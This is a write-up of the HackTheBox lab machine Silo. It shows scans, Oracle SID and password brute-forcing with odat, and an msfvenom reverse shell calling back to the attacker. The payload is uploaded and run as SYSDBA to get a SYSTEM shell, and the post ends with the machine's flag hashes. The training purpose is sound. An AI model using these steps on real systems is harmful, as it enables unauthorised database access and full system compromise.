HackTheBox Silo
Writeup for HackTheBox Silo
HackTheBox Silo
Machine Synopsis
Silo focuses mainly on leveraging Oracle to obtain a shell and escalate privileges. It was intended to be completed manually using various tools, however Oracle Database Attack Tool greatly simplifies the process, reducing the difficulty of the machine substantially. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
$ nmap -sC -sV -A -p- 10.10.10.82
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-title: 400 Bad Request
|_http-server-header: Oracle XML DB/Oracle Database
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-06-24T12:27:57
|_ start_date: 2022-06-24T12:24:38
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
Lets check out their website!
It seems like a standard Windows IIS webpage?
A quick gobuster scan showed that there was nothing interesting.
1
2
3
4
$ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirb/common.txt -t 50
...
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.82/aspnet_client/]
...
Lets move on to the next interesting port that is open - 1521.
Exploitation
Searching for Oracle TNS hacking on Google brings me to this HackTricks webpage.
At this point, it seems that we need to enumerate the SID (Service Identifier) to determine the database name.
There is an all in one tool called odat that allows us to brute force the SIDs and accounts for that specific SID.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ odat -h
...
sidguesser to know valid SIDs
passwordguesser to know valid credentials
...
$ odat sidguesser
21:20:15 CRITICAL -: Target(s) has to be given (with '-s IPadress' for example)
$ odat sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... #################################################### | ETA: 00:00:00
100% |###############################################################################################| Time: 00:00:46
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###############################################################################################| Time: 00:00:01
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ########################################## | ETA: 00:00:04
100% |###############################################################################################| Time: 00:00:43
[+] SIDs found on the 10.10.10.82:1521 server: XE
You can install
odatusingsudo apt install odat -y!
It seems like there’s a valid database name XE!
Next, we will need to find out the credentials for the database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ odat -h
...
sidguesser to know valid SIDs
passwordguesser to know valid credentials
...
$ odat passwordguesser
21:23:18 CRITICAL -: Target(s) has to be given (with '-s IPadress' for example)
$ odat passwordguesser -s 10.10.10.82
21:23:25 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.
$ odat passwordguesser -s 10.10.10.82 -d XE
$ odat passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do: | ETA: 00:02:09
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:14:42
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:13:06
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:11:11
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:06:47
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:04:10
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password | ETA: 00:02:52
[!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:02:28
[+] Valid credentials found: scott/tiger. Continue... ########## | ETA: 00:01:12
[!] Notice: 'xdb' account is locked, so skipping this username for password###################### | ETA: 00:00:13
100% |###############################################################################################| Time: 00:05:19
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
Privilege Escalation
Great, now that we have the database name and its credentials, we can try to upload a malicious reverse shell generated from msfvenom!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
$ odat -h
...
utlfile to download/upload/delete files
...
$ odat utlfile -h
usage: odat.py utlfile [-h] [-v] [--sleep TIMESLEEP] [--encoding ENCODING] [-s SERVER] [-p PORT] [-U USER] [-P PASSWORD] [-d SID] [-n SERVICENAME]
[--client-driver CLIENT-DRIVER] [--sysdba] [--sysoper] [--getFile remotePath remoteFile localFile]
[--putFile remotePath remoteFile localFile] [--removeFile remotePath remoteFile] [--test-module] [--no-color]
[--output-file OUTPUTFILE]
options:
-h, --help show this help message and exit
optional arguments:
-v enable verbosity (-vv for more)
--sleep TIMESLEEP time sleep between each test or request (default: 0)
--encoding ENCODING output encoding (default: utf8)
connection options:
-s SERVER server
-p PORT port (Default 1521)
-U USER Oracle username
-P PASSWORD Oracle password
-d SID Oracle System ID (SID)
-n SERVICENAME Oracle Service Name
--client-driver CLIENT-DRIVER Set client driver name (default: SQL*PLUS)
--sysdba connection as SYSDBA
--sysoper connection as SYSOPER
utlfile commands:
--getFile remotePath remoteFile localFile get a file from the remote database server
--putFile remotePath remoteFile localFile put a file to the remote database server
--removeFile remotePath remoteFile remove a file on the remote database server
--test-module test the module before use it
output configurations:
--no-color no color for output
--output-file OUTPUTFILE save results in this file
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=1234 -f exe > exploit.exe
$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe
[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[-] Impossible to put the /home/shiro/HackTheBox/Silo/exploit.exe file: `ORA-01031: insufficient privileges`
Hmm.. it seems like we have insufficient privileges.
Recall that the utlfile help menu showed the following flag:
1
--sysdba connection as SYSDBA
Lets try it!
1
2
3
4
$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile /temp exploit.exe /home/shiro/HackTheBox/Silo/exploit.exe --sysdba
[1] (10.10.10.82:1521): Put the /home/shiro/HackTheBox/Silo/exploit.exe local file in the /temp folder like exploit.exe on the 10.10.10.82 server
[+] The /home/shiro/HackTheBox/Silo/exploit.exe file was created on the /temp directory on the 10.10.10.82 server like the exploit.exe file
Yay it works!
Now, lets start a netcat listener and execute the reverse shell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ odat -h
...
externaltable to read files or to execute system commands/scripts
...
$ odat externaltable -h
usage: odat.py externaltable [-h] [-v] [--sleep TIMESLEEP] [--encoding ENCODING] [-s SERVER] [-p PORT] [-U USER] [-P PASSWORD] [-d SID]
[-n SERVICENAME] [--client-driver CLIENT-DRIVER] [--sysdba] [--sysoper] [--exec remotePath file]
[--getFile remotePath remoteFile localFile] [--test-module] [--no-color] [--output-file OUTPUTFILE]
options:
-h, --help show this help message and exit
optional arguments:
-v enable verbosity (-vv for more)
--sleep TIMESLEEP time sleep between each test or request (default: 0)
--encoding ENCODING output encoding (default: utf8)
connection options:
-s SERVER server
-p PORT port (Default 1521)
-U USER Oracle username
-P PASSWORD Oracle password
-d SID Oracle System ID (SID)
-n SERVICENAME Oracle Service Name
--client-driver CLIENT-DRIVER Set client driver name (default: SQL*PLUS)
--sysdba connection as SYSDBA
--sysoper connection as SYSOPER
ExternalTable commands:
--exec remotePath file execute a system command on the remote system (options no allowed)
--getFile remotePath remoteFile localFile get a file from the remote database server
--test-module test the module before use it
output configurations:
--no-color no color for output
--output-file OUTPUTFILE save results in this file
$ odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --exec /temp exploit.exe --sysdba
[1] (10.10.10.82:1521): Execute the exploit.exe command stored in the /temp path
- Netcat listener -
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.82] 49181
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
nt authority\system
OwO! We got the system authority shell after executing the exploit!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>cd C:\Users
cd C:\Users
C:\Users>dir
01/04/2018 10:40 PM <DIR> .
01/04/2018 10:40 PM <DIR> ..
01/03/2018 02:03 AM <DIR> .NET v2.0
01/03/2018 02:03 AM <DIR> .NET v2.0 Classic
01/03/2018 10:23 PM <DIR> .NET v4.5
01/03/2018 10:23 PM <DIR> .NET v4.5 Classic
01/01/2018 01:49 AM <DIR> Administrator
01/03/2018 02:03 AM <DIR> Classic .NET AppPool
01/07/2018 03:04 PM <DIR> Phineas
08/22/2013 04:39 PM <DIR> Public
C:\Users>type C:\Users\Phineas\Desktop\user.txt
2b431674efbc61c40c4219ca7cd67e3e
C:\Users>type C:\Users\Administrator\Desktop\root.txt
d2df154a2b64a4810b71acdc8b24fd61
This post is licensed under CC BY 4.0 by the author.